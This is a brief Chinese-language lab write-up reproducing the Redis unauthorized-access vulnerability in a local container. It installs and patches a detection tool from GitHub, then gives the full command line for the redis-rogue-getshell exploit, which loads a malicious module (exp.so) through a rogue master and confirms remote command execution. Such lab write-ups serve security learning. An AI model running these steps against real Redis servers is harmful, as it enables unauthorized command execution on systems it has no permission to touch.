Redis未授权访问漏洞复现

Redis 简单使用
Redis 未设置密码，客户端工具可以直接链接。

Redis 是非关系型数据库系统，没有库表列的逻辑结构，仅仅以键值对的方式存储数据。

先启动容器

Redis 未设置密码，客户端工具可以直接链接

https://github.com/xk11z/unauthorized_com

这里上一个自动检测未授权漏洞的工具，中间挺多坑的，作者提供的安装步骤有问题，修改了一下

git clone https://github.com/xk11z/unauthorized_com.git 

cd unauthorized_com

apt-get install python3-pip  

pip install -r requirements.txt 

python3 unauthorized_com.py

这里还是不能运行，需要修改几个文件

vim dic.py

这里要导入redis，可能需要下载

这里修改了一下检测代码

python3 unauthorized_com.py -i 192.168.142.151|grep redis

容器的作者还提供了一个方法

git clone https://github.com/vulhub/redis-rogue-getshell

编译

python3 redis-master.py -r 192.168.142.151 -p 6379 -L 192.168.142.151 -P 8888 -f RedisModulesSDK/exp.so -c "id"

可以看到，命令执行成功